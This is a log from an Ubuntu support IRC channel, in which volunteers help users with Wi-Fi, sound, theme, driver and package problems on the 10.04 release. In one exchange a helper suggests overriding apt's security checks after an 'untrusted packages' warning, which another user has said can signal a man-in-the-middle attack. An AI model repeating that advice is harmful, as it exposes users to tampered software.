Livingroomaaa: do you have any idea how to tie kismet into aircrack? lol. i have some more howtos to raed07:54
Livingroomaaa: *read07:55
spoonbThe arguement will vary with the processer.07:55
industrialHow do I add items in the list of windowmanagers in GDM? I compiled dwm in my homedir but can't select it.07:55
industrialI need to add it manually.07:55
sikunSam_Fisher, i do run gnome, also it is adjusting the fan to the temp as it gets warmer the fan is speeding up so that is a good sign i suppose, but it still says its at 27C, also acpi -V shows the cpu at 26.8C also07:55
spoonbgbear14275: dmesg well report it is enabled.07:55
nUboon2Agealabd: so you need it to NOT be inverse.07:56
Ginbun2I want enlightment on my netbook. is it using Ubuntu to install it the best way?07:56
gbear14275spoonb: this look right?   GRUB_CMDLINE_LINUX="CONFIG_AMD_IOMMU=y"07:56
paulo_Every time I reboot my system I need to reinstall my Wireless USB driver through ndisgtk. When it will be fixed, anyone knows?07:56
spoonbBut I really want you to check your bios, because it is almost always disabled by default which would prevent kernel support or cmd args from woking07:56
theadminHey, is it normal that swap is not used even though more than 80% of physical memory is in use?07:57
gbear14275spoonb: brb07:57
spoonbgbear14275, thats a kernel config style arguement.07:57
nUboon2Agepaulo_: are you running on a liveCD or liveUSB or a hard disk?07:57
paulo_nUboon2Age: hard disk07:57
industheadmin, some swap is always used i notice07:57
AAALivingroom  like I said, it's been a while since I've used kismet07:57
alabdnUboon2Age: NOT be inverse. ?07:57
jaldharso no one else is having flash problems on lucid except me?07:57
triaspiafirst timer using ubuntu, someone free to help with an internet connection issue?07:57
theadminindus, well, it says 0B out of 3GB in use... The System Monitor thing07:58
AAAtriaspia  what is the issue?07:58
industheadmin, ya its not unusual07:58
n2diytriaspia: wired, or wireless?07:58
industheadmin, now why is that so is the question , which i dont know07:58
triaspiawireless, cant seem to find my network07:58
nUboon2Agealabd: the theme available by default in themes is inverse, so its mostly black w/ white lettering, but you want mostly white w/ black lettering, no?07:58
naveen519unlike google im getting  opendns in firefox while searching for urls07:59
Sam_Fisherpaulo_, I had to do a clean install 2 days ago due to wifi death loop07:59
naveen519what this opendns is appearing in firefox browser07:59
nUboon2Agepaulo_: okay, that's bizarre.  what kind of install do you have?07:59
spoonbcmd line arguments are like this intel_iommu=on.07:59
n2diytriaspia: I've never had to configure wireless, it always worked out of the box for me.07:59
paulo_I think that there is a ndiswrapper bug related to this. Every time I reboot I need to unplug/plug my Wireless USB device and them reinstall its driver08:00
AAAtriaspia  can you connect to other networks? or at least be prompted for a passphrase?08:00
n2diytriaspia: do you have a network icon on your panel?08:00
alabdnUboon2Age:  yes to be used in black and white hard book  ,08:00
nUboon2Agepaulo_: oh, so its a usb wireless external device?08:00
paulo_nUboon2Age: yeap :)08:00
triaspiayeah, i click it and it says the network is disconnected, tried putting the details in as if it were a hidden network though it still wouldnt connect08:01
wildbatanyone know why my laptop screen won't go off if the lid is close. if i press the lid button i can see the screen off for 0.1 sec and then back on ~ and flashes again if i release the lid button .08:01
paulo_I turned my desktop wireless heh heh08:01
ukixxMouse issues in ubuntu fix that plz :)08:01
AAAtriaspia  I've had that issure recently with the 10.4 release myself08:01
n2diytriaspia: have you right clicked it?08:01
nUboon2Agepaulo_: do you know the bug number and if so have you subscribed to it for updates?  It really helps increase the profile of a bug when more people subscribe to it.08:01
ukixxwee need any mouse work out off box :)08:01
triaspiait seemed like it was trying to connect, but couldnt quite get there08:01
AAAtriaspia  service network-manager restart fixes it sometimes, others a reboot08:02
Sam_Fishertriaspia, I use wifi radar to help me find open wifi I mean my wifi netowork08:02
AAAtriaspia  I've tried doing it manually after stopping network-manager to no avail. there is a bug, somewhere, for sure08:02
sikunSam_Fisher, hmm... i getting some results on google saying it is a bug in the kernel with the intel atom processors, but i'm still digging08:03
alabdnUboon2Age: want to take white and black pivtures from ubuntu 10.04 default theme but you know it is dark and will be make problem08:03
AAAtriaspia  you can also try /etc/init.d/dbus restart to fix your wifi connect issues08:03
thune3industrial: i believe you need to create an .desktop entry in /usr/share/xsessions08:03
nUboon2Agepaulo_: do any of these bugs look like it: https://bugs.launchpad.net/bugs/+bugs?field.searchtext=wireless+usb&search=Search+Bug+Reports&field.scope=all&field.scope.target=08:03
wildbatSam_Fisher, i use airodump to find mine ;p08:04
triaspiaAAA: that came up a few times when i was googling, still no luck, its a wpa2-personal passworded/encrypted connection if that helps :S08:04
nick_wildbat, I have some trouble booting even into busybox now :( I think I will have to go with the grub rescue first and then see what happens - I have to go now, will try the rescue tonight, and will come in here tomorrow early morning. Thanks for your help!08:05
nUboon2Agealabd: so did you check the web sites Iisted w/ themes?08:05
AAAtriaspia  did it ever connect to this AP?08:05
arooni-mobile_2i have ubuntu 10.04;  i cant click to advance flash videos.  help!08:06
nUboon2Agealabd: you can get additional themes at http://www.gnome-look.org  and http://art.gnome.org and other places...08:06
triaspiathe laptop ive installed it on has under windows, just installed ubuntu about an hour ago but theres been no connection08:06
alabdnUboon2Age:  told you it should be 10.04 theme but only good white and black08:07
nUboon2Agealabd: so did you check those web sites?08:07
AAAtriaspia  are you saying you can't get your device to work under windows?08:07
Sam_Fisherarooni-mobile, in firefox?08:07
triaspiait works in windows, but not in ubuntu08:08
AAAtriaspia  ok. what is the model number of the device?08:08
triaspiaits a toshiba satelite L50008:09
om26ertriaspia, you have to update your system08:10
alabdnUboon2Age: yes but it should be 10.04 theme but only good white and black08:10
om26ertriaspia, apprently on ubuntuforms someone says wireless worked for him after updating Lucid08:10
AAAtriaspia  what is the WIRELESS device in your laptop? use lcpci to figure it out08:11
=== sandy is now known as Guest94461
triaspia"no command 'lcpci' found" did you mean 'lspci"08:12
AAAtriaspia  my bad. lspci08:12
n2diytriaspia: yes, lspci08:12
sandy_my speakers are not working so i have no sound08:13
triaspiaom26er ill have to try and find an ethernet cord somewhere, but thanks *link saved*08:14
AAAsandy_  run $ alsamixer and turn up the volume (to start)08:14
gbear14275crap... didn't even get to thank spoon08:14
Poul|RaiderAnyone who can help me, i have issues with tsclient/rdesktop with mounted drives on the local machine, when i create folders it gives and error. I found a fix on sourceforge for rdesktop, but its a xxx.patch file. I have no idea what to do with the file to "install" it08:14
om26ertriaspia, in terminal: gksudo software-sources it will open a window. in the third tab check first the lucid-proposed check box, click close and then click reload open terminal and do sudo apt-get dist-upgrade. probably a kernel bug.08:14
om26er*when you get the wired connection ofcource :)08:15
sandy_where do i run this08:15
industheadmin, http://www.linux.com/news/software/applications/8208-all-about-linux-swap-space08:15
AAAPoul|Raider  use the unix "patch" command08:15
AAAPoul|Raider  man patch for more details08:16
n2diysandy_: in a terminal08:16
sandy_ok thank you08:16
Sam_Fishersandy_, Do you know how to open a terminal command box?08:16
triaspiaAAA that brought up a huge list of stuff, not sure exactly which bit you need...08:17
WalterNok, I'm looking into building a new computer... which brings me to the classic question, ATI vs nvidia for driver support08:17
AAAtriaspia  figure out what is you wifi chip based on that08:17
R3cur51v3I get "WARNING: untrusted versions of the following packages will be installed!" when I try to install emacs.08:17
R3cur51v3What does that mean?08:17
AAAWalterN  nvidia08:18
WalterNis NVIDIA still that much better with their linux drivers?08:18
R3cur51v3You know what, I should LTFG.08:18
macoR3cur51v3: signature's wrong. either there's a different (newer) version going to be installed than last time you ran "sudo apt-get update" (in which case, run that cmmand now) or its from a ppa for which you lack the key or its badness08:18
arooni-mobile_2i have ubuntu 10.04;  i cant skip ahead in  flash videos on google chrome.  help!08:18
nUboon2Agepaulo_: have you had any luck finding a bug that fits?08:18
macoR3cur51v3: where badness = man in the middle08:18
triaspia06:00.0 network controller: Realtek semiconductor co., ltd device 8172 (rev 10)08:18
Sam_Fishersandy thanks for your help everyone LOL08:19
AAAR3cur51v3  haha. flame wars aside... apt-get install vim08:19
om26erarooni-mobile, 64bit?08:19
R3cur51v3AAA, I use vim08:19
Sam_FisherSoftphone any one?>08:19
R3cur51v3emacs has a built-in text adventure game I'm interested in08:19
alabdnUboon2Age:  ?08:19
AAAR3cur51v3  then why install emacs?08:19
R3cur51v3I have no interest in using the editor itself08:19
R3cur51v3Like I said, it has a built-in game I want to play.08:19
ouyeshi all , I want to add some applications to start when my computer start, after you logging in, these applications are running itself, how to do this?08:19
WalterNAAA, NVIDIA is still that much better?08:19
paulo_nUboon2Age: #416032 seems to fit, but is incomplete... I'm checking Dave Lentz comments on that bug to check if my settings are Ok. :)08:20
nUboon2Agealabd: yes?  Any luck finding a theme on those web sites?08:20
=== titaniumbrella is now known as carbonish
nUboon2Agepaulo_: I'll take a look at it.08:20
manu__anybody there?08:20
gbear14275ok I'm in my BIOS, trying to figure out how to tell if IOMMU is enabled in here... I have a Gart Error reporting option...08:20
AAAWalterN  I won't say _much_ better. but gatos has been dead for years...08:20
=== prof_away is now known as Prof_BiG_BanG
WalterNAAA, gatos?08:20
AAAWalterN  an old ati linux driver08:21
alabdnUboon2Age:  told you , themse should be ubuntu 10.04 default themse nothing esle but color scheme of it should be proper white and black08:21
WalterNAAA, what does that have to do with it? lol08:21
AAAR3cur51v3  so what happens when you apt-get install emacs?08:21
ikoniaalabd: gnome-look.org for gnome themes08:21
alabd^ ikonni08:22
nUboon2Agealabd: yes, I understand that.  So have you discovered any that work for you on those web sites?08:22
ikoniaalabd: what ?08:22
AAAWalterN  that ati doesn't have a current driver for their gear and nvidia does08:22
triaspiaAAA: i found 06:00.0 network conntroller: Realtek Semiconductor Co., Ltd. Device 8172 (rev 10) is that what i was looking for?08:22
R3cur51v3AAA I get some messages like "WARNING: untrusted versions of the following packages will be installed!"08:22
alabdikonia:  theme should be ubuntu 10.04 default themse nothing esle but color scheme of it should be proper white and black08:22
R3cur51v3AAA it's odd because I haven't had problems with the Ubuntu repository before08:22
ikoniaalabd: you install the themes you want08:22
AAAtriaspia  that is your 10/100 on board NIC, not wireless08:22
nUboon2Agepaulo_: Yes, I saw that one too but hoped there would be one more detailed that would fit.08:22
ikoniaalabd: gnome-look.org is a good place to get them08:22
obsidieththe uh. network manager icon is missing from 'notification area'08:22
Sam_FisherGooglevoice and Sip Phone08:22
alabdikonia:  read question exactly08:23
alabdwant to take white and black pictures from ubuntu 10.04 default theme but you know it is dark and will be make problem08:23
ikoniaalabd: ask the question clearly08:23
R3cur51v3All I needed to do to fix the problem was "sudo aptitude update"08:23
WalterNAAA, how about multiple screen support?08:23
AAAR3cur51v3  then you just need to override the security checks, or add the gpg keys08:23
ikoniaalabd: use take a snapshot application08:23
alabdikonia:  that default theme is most black08:23
nUboon2Ageikonia: the default theme set includes High Contrast Inverse, but alabd wants it to NOT be inverse.08:24
NerikoEvening everyone. Will someone please tell me how to set up my pop3 hotmail account in Evolution?08:24
ikonianUboon2Age: then he needs to install a theme he wants08:24
ikoniaalabd: so ? change the theme as I've told you08:24
AAAWalterN  I've used nvidia with multi-screen in linux.  just xorg.cong config08:24
ouyeshow to find the command line of application xchat??08:24
nUboon2Ageikonia: yes, that's what i've been trying to tell alabd.  I don't think alabd knows about installing themes.08:24
Poul|RaiderAAA okay, will take a look at it08:24
FloodBot2alabd: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.08:24
AAAouyes  ps auxwwww | grep -i xchat08:25
ikoniaalabd: 1.) use the application->accessories->take screen shot applications to take photos of your desktop 2.) install a theme you want for gnome08:25
ikoniaalabd: it is NOT in ubuntu - YOU install the theme you want08:25
sandy_i have no sound?08:25
ikoniaalabd: if you flood the channel like that again you will be removed from the channel08:25
alabdikonia:  humble say it must08:25
alabdhow should humble say this08:25
ikoniaalabd: it's not - deal with it08:25
n2diysandy_: is alsamixer open?08:25
FloodBot2alabd: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.08:25
triaspiaAAA i cant seem to see anything speciffically relating to wireless :S08:26
WalterNAAA, hmm... ok.. also... looking at newegg it seems most of the AMD motherboards only support crossfire, and not SLI :/08:26
untmdsprtooo, a ban08:26
AAAtriaspia  iwconfig <-- any interfaces?08:26
n2diysandy_: ok turn your sliders up, and make sure there are no red mute boxes at the bottom.08:26
AAAWalterN  huh?08:27
AAANeriko  sup?08:27
NerikoI'm having a brain fart...can't seem to get smtp to work for hotmail using Evolution08:27
WalterNAAA, I mean most of the AM3 socket based motherboards, most seem to support crossfire (ATI) only...08:27
sandy_master is red?08:27
obsidiethah thats better08:28
ikoniaNeriko: it requires smtp auth doesn't it ?08:28
adantehey guys, is there a way to get this for intrepid? https://bugs.launchpad.net/samba/+bug/46217208:28
Poul|RaiderAAA, the patch -p num ? what is the value of num ?08:28
triaspialo no wireless extentions, eth0 no wireless extentions, wlan 802.11bgn Nickname: "rtl8191SEVA2"08:28
n2diysandy_: click on the red, it should turn off.08:28
NerikoYes, and I've done that..but apparently Evolution doesn't let me select the port08:28
AAAPoul|Raider  like patch -p0 /path/to/xxx.patch08:28
thecubehi, anybody know how to get pass "GLib-WARNING **: getpwuid_r(): failed due to unknown user id (0)?" i cant install or even "try before install" on ubuntu 10.04?08:28
siddharthagtk2-module-rgba + murrine not working in lucid, hangs08:29
AAAtriaspia  so your device sees other Ap's08:29
ikoniathecube: that could be a damaged cd not able to get the correct uid details08:29
thecubeikonia: thanks will try to reburn, do you think my iso is bad?08:30
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n2diysandy_: the red you are looking for is at the bottom of the slider, not the slider itself.08:30
om26er!hi | abhay_08:30
ubottuabhay_: Hi! Welcome to #ubuntu! Feel free to ask questions and help people out. The channel guidelines are at https://wiki.ubuntu.com/IRC/Guidelines . Enjoy your stay!08:30
abhay_anyone knows a good chat client that supports video calling!!08:30
triaspiaAAA, i cant say, theres no others in my area to test with08:30
darti ma getting the following error when i type sudo nautilus....http://yfrog.com/4jscreenshotpkp...how to solve this?08:30
n2diydart, try using gksudo08:31
abhay_I've tried pidgin & empathy, but they seem to hang...08:31
AAAPoul|Raider  the -p0 means your patch file is in the  CD (I think).  so, your current working directory is important when patching the source.  It is relative to the source you are patching.08:31
ikoniathecube: maybe, check the md5sums08:31
dartn2diy, i tried it :(08:31
Sam_Fisherabhay_, Fix Pidgin it is the best08:32
siddharthagyachi no sound and video call problem08:32
sandy_ok i still have no sound08:32
Sam_Fisherabhay_, reinstall it in synaptic08:32
n2diydart, does nautilus work in gnome?08:33
dartn2diy, ya...08:33
Sam_Fishersandy_, Oh thanks for the help before when you had no sound ;-)08:33
n2diydart, odd.08:33
abhay_hmm... I think i'll try that08:33
[Screamo]is displayconfig-gtk removed from  10.04?08:33
dartn2diy, no idea how to solve it08:34
triaspiaAAA, i cant say, theres no others in my area to test with08:34
Sam_Fisherdart, still the Nautilus issue? Jeesh just use paper and pencil already!08:34
n2diydart, not at the moment.08:34
OneginÇäðàâñòâóéòå! Ïîñîâåòóéòå ïîæàëóéñòà Jabber ñåðâåð ïîä Ubuntu.08:34
Sam_FisherI'm not helping her08:34
dartn2diy, btw when i try to open root folder in system drive where ubuntu is insatalled...it says me that u cant open it coz u r not the owner....a big cross is on the folder's icon....08:35
siddharthagwibbet is not working in lucid08:35
dartSam_Fisher, ya...still....sigh08:35
Sam_Fisherdart, Oh now we know the problem!08:35
AAAtriaspia  for fun, try this08:35
n2diydart, that is good, and normal, that's why you want gksudo nautilus.08:36
OneginHello Advise please Jabber server under Ubuntu.08:36
Sam_Fisherdart, permission issue08:36
siddharthacan't login to twitter/facebook through gwibber ,pls help08:36
dartSam_Fisher, how can i solve this?08:36
AAAtriaspia  never mind, sorry08:36
triaspiaok then08:36
Sam_Fisherdart, have you always used the same password and account?08:36
dartn2diy, i tried gksudo....same problem08:37
dartSam_Fisher, yeah08:37
Sam_Fisherdart, darn08:37
n2diysandy_: if you don't use my nick in your reply, I might not see/hear it, like just now. So all your sliders are up, and there are no red dots at there bottom? Is the slider on your panel turned up?08:37
dartin user accounts i hv got only account that too is administrator08:37
Sam_FisherYou need to set your user to have more permission08:37
[Screamo]Can someone give me any ideas as to how to fix this http://ubuntuforums.org/showthread.php?t=91287708:37
siddharthasam_fisher,  can't login to twitter/facebook through gwibber ,pls help08:37
[Screamo]specificly http://ubuntuforums.org/showpost.php?p=9375767&postcount=708:38
Sam_Fishersiddhartha, is gwibber a chat program?08:38
siddharthaany idea how to fix gwibber in ubuntu 10.0408:38
n2diysandy_: umm the speakers are plugged in, and turned on?08:39
siddharthasam_fisher,gwibber is a social website update app.08:39
wildbatdart, y don't you look into your /root see if there is .config there?08:40
Sam_Fishersiddhartha, has it ever worked for you? Has FB changed the server info you are using?08:40
sandy_n2diy yes08:41
siddharthasam_fisher, it does not work for me. i have tried to login to FB/twitter, but not works08:41
[Screamo]wtf, my resolution is like 2048X1536!08:43
n2diysandy_: umm the speakers are plugged in to the speaker jack, and not the mic or line in jack?08:43
Sam_Fisher[Screamo], stop bragging!08:43
sandy_n2diy i have double checked that08:43
[Screamo]Sam_Fisher, my monitors max resolution is like 1800x1200 >.>08:44
n2diysandy_: ok, can you test them on another system?08:44
sandy_n2diy they worked08:44
Sam_Fisher[Screamo], Nvidia driver? Laptop?08:44
[Screamo]not laptop08:45
wildbatanyone know why my laptop screen won't go off if the lid is close. if i press the lid button i can see the screen off for 0.1 sec and then back on ~ and flashes again if i release the lid button .08:45
n2diysandy_:ok, do you see a DCM slider, doudle check that.08:45
Sam_Fisher[Screamo], are you using the built in video driver or did you install your own chosen driver?08:46
sandy_n2diy no i dont08:46
sandy_n2diy i have a pcm08:46
[Screamo]nvm http://www.amazon.com/Trinitron-Monitor-Dell-P1110-2048x1536/dp/B000EDKLP2 says 2048x1536 is the max08:46
Sam_Fisherwildbat, powermanagement preference08:46
n2diysandy_: ok, is that turned up, and unmuted?08:47
Sam_Fisher[Screamo], so you have max set what is the problem?08:47
wildbatSam_Fisher, that's non the issue08:47
sandy_n2diy yes08:47
[Screamo]well compiz is gone now08:48
Sam_Fisherwildbat, that's where you set the action to be taken when the lid is shut08:48
wildbatSam_Fisher, i know but it is not behaving as expected08:48
Sam_Fisher[Screamo], could you please ask you question again?08:48
Sam_Fisherwildbat, yeah I bet the network card is over riding it and turning it back on.'08:49
Sam_Fisher[Screamo], you need to open Preferences then Appearance and then Visual Affects to Extra08:50
[Screamo]Sam_Fisher, yes i know this08:51
n2diysandy_: I'm at a loss.08:51
[Screamo]ive been battling with this for 8 months now\08:51
sandy_n2diy no idea at all08:51
[Screamo]im just going to go back to no compiz08:52
n2diysandy_: I"ve tried every trick I know of.08:52
meocakeshas anyone tried the chrome OS here ?08:52
n2diysandy_: at the bottom of most of the sliders, they say 00 in white, right?08:52
Sam_Fisher[Screamo], so you are set to extra? And you have changed your Monitor settings?08:53
n2diysandy_: the box at the bottom of the slider should be greenish, not ghosted gray.08:54
sandy_n2diy just the master headphone and the 2 pidf the others have mm in them08:55
[Screamo]i tried setting it to extra, but after about 1 min of widows flashing and disappearing it comes up with desktop effect could not be enabled08:55
n2diysandy_: ok, use the arrow keys to highlight the ones with mm, and then use the m key to toggle them.08:55
MindSparkhi, can someone have a look at following dmesg output ? http://pastebin.com/8qtdchmE08:56
MindSparkthe switch  between 13th and 14th the server hasn't been responding08:56
MindSparkthe switch  between 13th and 14th the server hasn't been responding08:56
Crash1hdhey all I am using mysqldump --all-databases > allmysql-`date +%Y-%m-%d`.sql for a daily backup but I realized that I have 30+ databases and I want to back up each of them individually? any ideas?08:56
MindSparkdoes the log say anything ?08:56
n2diysandy_: you might want to turn some gain down, I think things are going to get noisy now.08:57
HypothesisFroghi. I'm having real problems resolving dependencies for mysql stuff in hardy. It's for a vps server.08:58
sandy_n2diy ok i have a lot of stactic now08:58
kandinskiI have upgraded my karmic setup only to lose X because Error: API mismatch: the NVIDIA kernel module has version 195.36.15,08:59
kandinskibut this NVIDIA driver component has version 195.36.24.  Please make08:59
kandinskisure that the kernel module and all NVIDIA driver components08:59
kandinskihow can I fix it? thanks08:59
Sam_Fisher[Screamo], Find out which driver you have and install the newest driver and reboot and you should be right as rain08:59
Sam_FisherGood night folks 3 am here08:59
n2diysandy_: ok, put your gains down to half, play around, at least you have something to work with now.08:59
sandy_n2diy thank you so very much i will see what happens.09:00
n2diysandy_: good luck.09:00
=== emc_ is now known as emc
[Screamo]damn it Empathy wont sign in to anything09:02
xae8kooI need a complete simple guide to setup php/mysql on localhost...09:02
ubottuLAMP is an acronym for Linux-Apache-MySQL-PHP. However, the term is often used for setups using alternative but different software, such as Perl or Python instead of PHP, and Postgres instead of MySQL. For help with setting up LAMP on Ubuntu, see  https://help.ubuntu.com/community/ApacheMySQLPHP - See also the Server CD installation process (different in Edgy+)09:03
Aciidlamb is a delightful steak meal09:03
andrewyiyiI'm new to ubuntu, think its great but having problems with one thing - my girlfriend is chinese and she needs to be able to type chinese into word and skype and QQ. Can somebody help me with this.09:03
ubottuTo set up and configure your locales, see https://help.ubuntu.com/community/LocaleConf09:04
[Screamo]what the msn messenger app09:04
Jordan_Uandrewyiyi: SHe might want to ask in #ubuntu-cn09:08
wildbatandrewyiyi, system > pref. > ibus09:08
wildbatandrewyiyi, system > admin > language to install input method.09:09
andrewyiyiwildbat thanks for rely their are many options which one is the right one09:10
wildbatandrewyiyi, input method ....09:11
rethushave installed synce to connect to my mw 6.5 device. on my xfce-laptop, i connect the cable, and xfce found it as new eth2 device,,, and kpm is configureable. on my kubuntu 10.04 nothing happend.09:11
rethusany idea, why synce differ from xubuntu 10.04 to kubuntu 10.04 ?09:12
andrewyiyiI know  but under input method which pinyin option do i choose or do install all of them09:12
xae8kooCan I run .bat files in ubuntu?09:12
dumbassssHello, is there any way to convert my .ppt file to a text file in ubuntu ? i've tried to export it in OO impress to html but it only converted the slides to png :/ i need to extract the text because I have too many slides and can't select the text manually from each one and copy/paste.09:12
radikalrethus  the diferense is the theme and ubuntu is base in gnome and kubuntu in kde09:13
totemdumbassss: i love your nick09:13
dumbassssi love totem playe09:14
radikalhey totem hi . u dont remember me09:14
andrewyiyi wildbat I know  but under input method which pinyin option do i choose or do install all of them09:15
rethus radikal: so i wonder, why kde don't found the device as eth209:15
ubottuThis is not a file sharing channel (or network); be sure to read the channel topic. If you're looking for information about me, type « /msg ubottu !bot »09:15
wildbatandrewyiyi, that's up to you you can test it all or one by ne09:15
ouyeswhat is this? Can not install 'gnochm' (E:Unable to correct problems, you have held broken packages.) ?/09:16
ouyeshow to fix it?09:16
radikalrethus give  a second09:17
raddyHello Everybody09:17
moetunesouyes: was there more to the error?09:17
ouyesmoetunes, nope09:18
brickywhere do I install themes from gnome look09:18
raddyDid anybody noticed that Ambiance theme, wifi icon still looks black color and easily visible?09:18
moetunesouyes: you can try   sudo apt-get install -f09:18
rethusradikal: in synce-kpm all buttons in gui are disabled.09:19
ouyesmoetunes, Reading package lists... Done09:19
ouyesBuilding dependency tree       Reading state information... Done 0 upgraded, 0 newly installed, 0 to remove and 9 not upgraded.09:19
radikalnot is disable so  can can try whit left click and configurate09:20
moetunesouyes: try the install now09:20
rethusi got htis on the cmd: http://rethus.pastebin.com/TWiSZnJy09:20
DNDhi guys. i have ubuntu 8.04. how can i upgrade my lamp stack to the latest version?09:21
ouyesmoetunes, can you recommend another chm read tools?09:21
DNDusing apt09:21
andrewyiyiwildbat - thanks its seems to work!!!!!09:21
moetunesouyes: I use xchm09:21
rethusah, this was only, cause i try to execute is as root.09:22
rethusbut have same efekt09:22
ouyesmoetunes, E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?09:22
ouyesmoetunes, when I run sudo apt-get install xchm09:22
radikalrethus how run  root comand?09:23
radikalin terminal09:23
rethusi use sudo.. but i have read i had to use kdesudo09:24
rethusbut this was only a try... also with root it didn't work09:24
ouyesI get a warning when try to update , http://paste-bin.com/view/285251b2, what is it?09:24
moetunesouyes: ouyes try   sudo apt-get update09:24
ouyesmoetunes, http://paste-bin.com/view/285251b209:24
radikalyes, but to get acces to root instalations u need  put frist   "su?09:24
[Screamo]now it doesnt show my highest resolution09:25
moetunesouyes: seems the upgrade might have had a hitch09:25
raddyDid anybody noticed that Ambiance theme, wifi icon still looks black color and easily visible?09:26
rethusradikal:: if i use multysync i got this: http://rethus.pastebin.com/JJzC7xkR09:26
pablohnjoin #electronica09:26
bollyhiya all i have a nokia d211 on an old machine and was trying to install the drivers for it but couldn't find one for the 2.6 kernel - i've installed the drivers for windows with ndiswrapper and am wondering where to go from here09:27
ouyesmoetunes, how to solve it ?09:28
radikalrethus ok   what u want try  istall>09:28
moetunesouyes: you could try   sudo ap-get upgrade && sudo apt-get dist-upgrade   to see if it pulls in more09:28
rethus radikal: i don't understand09:29
rethuswhat have i to install?09:29
brickyhey how do I install gnome look themes or packages09:29
radikalbrick what distro do u have?09:30
brickyradikal: ubuntu :)09:32
ouyesthen here is another question, I have a blackberry 9520, it have a modem inside,and I can get access to the internet via the modem in my computer under windows(yes I get access to the internet from the modem in my cell phone)), but how to do the same thing under ubuntu ?09:32
radikalbricky u can use repositorio or  install art manager  from ubuntu softwer center09:33
rethusradikal: i have no disabled "advanced networkconnection" on my wm device, and got this in /messages/ if i connect:09:33
brickyradikal: Thanks man09:33
=== karthik is now known as Guest26294
rethusseems the device try to set a new eth device but can't establish it ?!09:34
brickylet's see how this MAC OSX looks on ubuntu :)09:34
radikalretus  make left click and enable ur divace09:34
pazsioncan't mount ntfs hd?09:35
radikalyes let me  a second09:35
=== ross is now known as Guest52749
pazsionhow do i install nvidia drivers from nvidia.com *.run??09:35
ouyesis there anyone get a blackberry?09:36
rethusradikal: jeha, i found it... have firestarter as firewall started, and have to stop firewall, now the connection establish09:36
HandyGandyHello. How can I find out what a pariculr key sequence is bound to?09:36
radikal good loook men and  njoin09:36
pazsioncan anyone help me ??^^09:36
wildbatHandyGandy, System > Perf. > Keyboard Shortcut09:36
radikalbricky  u can copi and paste this repositorio  n ur terminal09:37
radikalsudo apt-get install gnome-themes-extras09:37
rethusradikal, thanks a lot. now i only have to find out, which adress/ports have i to open... so i didn't need to deactivate the firewall in future09:37
moetunespazsion: http://www.ubuntugeek.com/howto-install-nvidia-drivers-manually-on-ubuntu-10-04-lucid-lynx.html09:37
anirvanaNeed to install wifi in my ubuntu offline?Is there anyway I can do it with tarballs ?09:37
wildbat!modem | ouyes09:37
ubottuouyes: You want to connect via dial-up? Read https://help.ubuntu.com/community/DialupModemHowto - Also try disabling/removing KNetworkManager if KDE applications cannot connect using dial-up09:37
pazsionmoe: its the same for 8.04 right?09:38
ouyeswildbat, you can find the modem in the bb under ubuntu09:38
moetunespazsion: I wouldn't know - never tried09:38
moetunes!tab | pazsion09:39
ubottupazsion: You can use your <tab> key for autocompletion of nicknames in IRC, as well as for completion of filenames and programs on the command line.09:39
wildbatouyes, you need a driver~ if it can't detect your modem09:39
DNDhello? how can i upgrade my apache and php to the latest version on my ubuntu 8.04?09:39
bollyhiya all i have a nokia d211 on an old machine and was trying to install the drivers for it but couldn't find one for the 2.6 kernel - i've installed the drivers for windows with ndiswrapper and am wondering where to go from here? At the moment i see now wlan0 or anything like that. Thanks!09:39
anirvanaNeed to install wifi in my ubuntu offline?Is there anyway I can do it with tarballs ? help please :)09:39
lefantomedloperahello I have a problem mounting a partition09:40
radikalanirvana maybe not because u need downlaod and installl the drivers09:40
lefantomedloperaI make sudo mkdir /media/disk09:40
lefantomedloperasudo mount /dev/sda2 /media disk09:41
wildbatanirvana, you can browse and get the package. and somehow (USB may be) to your offline ubuntu09:41
lefantomedloperaand sudo chown lefantomedlopera /media/disk09:41
chinmaya_nanirvana, I think u can use ndiswrapper , which makes widows drivers suitable for ubuntu09:41
lefantomedloperafor this last line I fave the echos chown: changing ownership of `/media/sd2go/': Operation not permitted09:41
moetunes!aptoncd | anirvana09:41
ubottuanirvana: APTonCD is a tool with a graphical interface which allows you to create one or more CDs or DVDs with all of the packages you've downloaded via apt-get or aptitude, creating a removable repository that you can use on other computers - See also !offline09:41
anirvanawildbat : I can't the tarball anywhere :(09:41
lefantomedloperaHhat should I do to change owner to say it is the disk of lefantomedlopera in the group root09:42
chinmaya_nanirvana, I think u can use ndiswrapper , which makes widows drivers suitable for ubuntu09:42
lefantomedloperaand not the root's disk09:42
wildbatlefantomedlopera, you can't chown a mount point ~ use mount option instead -o uid=user123 gid=grp12309:42
ghatuhi all, my friend's pen drive is crashed after he ran autorun.inf file. Pen drive fail's to mount on my ubuntu is there any way i can recover files using scsi tools like sg3 etc09:42
josh-NWith Firefox I get sound lags/loops on Youtube videos... it used to work and i can't really tell which update broke it... Firefox 3.6.3 - Gecko Media Player - Kubuntu 10.409:42
matanyawhat whildcat said09:42
triaspiaanyone else have a problem with ubuntus default chat not always showing messages in the convo window (getting a popup on the right side of the screen but the message isnt showing in the window)09:42
wildbatanirvana, you can browse the apt url ~ it is http09:42
anirvanaIs there anyway I can download the source and then compile it in ubuntu for wifi intaller?09:43
nUboon2Ageanirvana: is there any possibility of plugging into an ethernet connection?  It is SO much harder w/o one and some of the tools even expect a connection to a repository.09:44
radikalanirvana cuz u need internet conection09:44
josh-NAnyone here have experience with Firefox (or FF plugin) sound issues?09:44
pazsioni have d/led nvidia drivers from their site and want to run the file, how do i do that in 8.04?09:44
anirvanaradikal : I have a dual boot system,I can download the packages in windows save it in and then access the packages in ubuntu ;)09:45
wildbatanirvana, is the tools you looking for in the repos?09:45
pazsionanirvana i wish i could mount my ntfs...09:45
anirvanawilbat : sorry, I can't understand your question09:45
triaspiaanyone else have a problem with ubuntus default chat not always showing messages in the convo window (getting a popup on the right side of the screen but the message isnt showing in the window)09:45
moetunes!fstab | pazsion09:45
ubottupazsion: The /etc/fstab file indicates how drive partitions are to be used or otherwise integrated into the file system. See https://help.ubuntu.com/community/Fstab and http://www.tuxfiles.org/linuxhelp/fstab.html and !Partitions09:45
nUboon2Ageanirvana: first have you figured out which driver you need?09:45
anirvananUboon2Age : Not yet09:46
radikalanirvana that never and trid  so i dont know if workin09:46
SNowanyone can help me on this: http://p.defau.lt/?QZBDlyFT_BkH7fIEN4njLg09:46
